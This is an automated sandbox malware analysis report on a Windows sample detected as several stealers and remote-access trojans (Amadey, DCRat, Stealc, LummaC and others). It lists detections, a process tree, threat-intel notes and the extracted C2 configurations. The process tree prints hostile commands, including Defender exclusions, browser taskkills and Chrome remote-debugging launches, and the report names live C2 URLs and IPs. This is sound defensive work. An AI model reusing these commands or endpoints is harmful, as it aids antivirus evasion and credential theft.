Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1571039
MD5:	807928c7c8d81bf2c9f4ab5ba2f4763b
SHA1:	c48a08c824e5e273297c333c8e5b1e766f2ba8c2
SHA256:	2a3bba0c74c6ecab8ab9e722a3d2c19866d930c7f79a732ad6a0d24378a6836c
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected DCRat

Yara detected DarkVision Rat

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected UAC Bypass using CMSTP

Yara detected Vidar stealer

.NET source code contains potential unpacker

.NET source code contains very large strings

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Drops PE files to the document folder of the user

Drops script or batch files to the startup folder

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

Powershell drops PE file

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Script Execution From Temp Folder

Switches to a custom stack to bypass stack traces

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses powercfg.exe to modify the power settings

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates driver files

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Remote Thread Creation By Uncommon Source Image

Stores files to the Windows start menu directory

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 807928C7C8D81BF2C9F4AB5BA2F4763B)

chrome.exe (PID: 7640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2148,i,11544534191024367753,17094532102307047588,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 4008 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\DBFIEHDHII.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DBFIEHDHII.exe (PID: 3632 cmdline: "C:\Users\user\Documents\DBFIEHDHII.exe" MD5: 9B3EF3C58C88279086B777393B2CE36B)

skotes.exe (PID: 8132 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 9B3EF3C58C88279086B777393B2CE36B)

svchost.exe (PID: 7752 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

skotes.exe (PID: 2676 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 9B3EF3C58C88279086B777393B2CE36B)

skotes.exe (PID: 7716 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 9B3EF3C58C88279086B777393B2CE36B)

wTMEVe8.exe (PID: 1148 cmdline: "C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe" MD5: 5DB95C4DE9B6E98C653AC3DEC5DCE83D)

conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wTMEVe8.exe (PID: 888 cmdline: "C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe" MD5: 5DB95C4DE9B6E98C653AC3DEC5DCE83D)

wTMEVe8.exe (PID: 1836 cmdline: "C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe" MD5: 5DB95C4DE9B6E98C653AC3DEC5DCE83D)

XXgM7ZsSvR.exe (PID: 6996 cmdline: "C:\Users\user\AppData\Roaming\XXgM7ZsSvR.exe" MD5: F3EDFF85DE5FD002692D54A04BCB1C09)

conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wVBhC3KCkV.exe (PID: 3684 cmdline: "C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe" MD5: 579FD24F4CACC972F63F47214F9C3C34)

cmd.exe (PID: 6696 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\580b9vjIX7.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6476 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 3396 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe (PID: 3060 cmdline: "C:\Program Files (x86)\jdownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe" MD5: 579FD24F4CACC972F63F47214F9C3C34)

ntRoEwh.exe (PID: 5376 cmdline: "C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe" MD5: 3541C1AC26EB5BBB87F01C20FD9F8824)

callmobile.exe (PID: 1640 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe MD5: FFABCC262FB699998B6191D7656C8805)

powershell.exe (PID: 3284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1013248041\KeaEfrP.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

downloaded_file.exe (PID: 7708 cmdline: "C:\Users\user\AppData\Local\Temp\downloaded_file.exe" MD5: D60C9E070239F8C240AAA6D8832E11EF)

cmd.exe (PID: 2664 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4944 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

explorer.exe (PID: 4124 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 1220 cmdline: C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8} MD5: 662F4F92FDE3557E86D110526BB578D5)

WindosCPUsystem.exe (PID: 6792 cmdline: "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" "" MD5: D16E6918118A615A302759477165E256)

powercfg.exe (PID: 6812 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 6816 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 6760 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 6764 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 6884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 6952 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

60c1233683.exe (PID: 8128 cmdline: "C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe" MD5: 78CBDC5E45F97CA8C6E6E72D99BD5BF1)

50c9f14fb7.exe (PID: 7704 cmdline: "C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe" MD5: 807928C7C8D81BF2C9F4AB5BA2F4763B)

5e54822fbe.exe (PID: 6208 cmdline: "C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe" MD5: EF28C394DDDD56CEBAD7E246ABB81976)

taskkill.exe (PID: 2708 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5332 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 2000 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 2140 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rundll32.exe (PID: 6716 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)

60c1233683.exe (PID: 6224 cmdline: "C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe" MD5: 78CBDC5E45F97CA8C6E6E72D99BD5BF1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Threatname: LummaC

{"C2 url": ["formy-spill.biz", "print-vexer.biz", "dare-curbys.biz", "zinc-sneark.biz", "se-blurry.biz", "covery-mover.biz", "impend-differ.biz", "atten-supporse.biz", "dwell-exclaim.biz"], "Build id": "LOGS11--LiveTraffic"}

Threatname: DCRat

{"C2 url": "http://77.73.39.158/4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: DarkVision Rat

{"C2": "185.157.162.216", "Port": 5200}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\downloaded_file.exe	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
C:\Users\user\AppData\Local\Temp\downloaded_file.exe	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\Users\user\AppData\Local\Temp\downloaded_file.exe	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x318c0:$s1: CoGetObject 0x31948:$s2: Elevation:Administrator!new:
C:\ProgramData\Package Cache\SystemSettings.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 4 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000023.00000002.2874624996.00000000003E1000.00000040.00000001.01000000.0000001B.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000024.00000003.2763632421.0000000001200000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
00000024.00000003.2763632421.0000000001200000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000022.00000003.2847457804.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000027.00000002.2956530663.0000000002E08000.00000002.00001000.00020000.00000000.sdmp	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
00000027.00000002.2956530663.0000000002E08000.00000002.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001B.00000002.2962692398.0000000003171000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001E.00000002.2958021104.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000024.00000002.2768909710.0000000000902000.00000002.00000001.01000000.0000001C.sdmp	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
00000024.00000002.2768909710.0000000000902000.00000002.00000001.01000000.0000001C.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000023.00000003.2780250709.0000000004D90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000013.00000000.2454433505.00000000007F2000.00000002.00000001.01000000.00000011.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000C.00000002.2957628244.0000000000DD1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000022.00000003.2753152898.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2113309307.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2114430584.000000000176E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001E.00000002.2958021104.0000000002761000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000A.00000002.2182584955.0000000000DD1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002B.00000002.2957653821.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001C.00000002.2807680074.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
0000001C.00000002.2807680074.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.2188220739.0000000000DD1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001B.00000002.3362367809.0000000005E80000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000024.00000000.2762140149.0000000000902000.00000002.00000001.01000000.0000001C.sdmp	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
00000024.00000000.2762140149.0000000000902000.00000002.00000001.01000000.0000001C.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000009.00000002.2153817470.0000000000D41000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000024.00000002.2770761069.00000000011FB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
00000024.00000002.2770761069.00000000011FB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000003.1668555153.00000000054C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000023.00000002.2876580011.000000000107E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000022.00000003.2728825814.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2455002578.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: file.exe PID: 7396	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7396	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7396	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7396	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: wTMEVe8.exe PID: 1836	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: wVBhC3KCkV.exe PID: 3684	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: callmobile.exe PID: 1640	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: callmobile.exe PID: 1640	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 3284	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
Process Memory Space: powershell.exe PID: 3284	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: powershell.exe PID: 3284	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x19138c:$b1: ::WriteAllBytes( 0x190fff:$b2: ::FromBase64String( 0x1ccb21:$b2: ::FromBase64String( 0x190fde:$b3: ::UTF8.GetString( 0x1ccb00:$b3: ::UTF8.GetString( 0x37276:$s1: -join 0x4434b:$s1: -join 0x4771d:$s1: -join 0x47dcf:$s1: -join 0x498c0:$s1: -join 0x4bac6:$s1: -join 0x4c2ed:$s1: -join 0x4cb5d:$s1: -join 0x4d298:$s1: -join 0x4d2ca:$s1: -join 0x4d312:$s1: -join 0x4d331:$s1: -join 0x4db81:$s1: -join 0x4dcfd:$s1: -join 0x4dd75:$s1: -join 0x4de08:$s1: -join
Process Memory Space: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe PID: 3060	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: 60c1233683.exe PID: 8128	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 60c1233683.exe PID: 8128	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 60c1233683.exe PID: 8128	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 60c1233683.exe PID: 8128	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 50c9f14fb7.exe PID: 7704	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 50c9f14fb7.exe PID: 7704	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: downloaded_file.exe PID: 7708	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
Process Memory Space: downloaded_file.exe PID: 7708	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: explorer.exe PID: 4124	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
Process Memory Space: explorer.exe PID: 4124	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 52 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
28.2.powershell.exe.60b0328.0.raw.unpack	JoeSecurity_DarkVisionRat	Yara detected DarkVision Rat	Joe Security
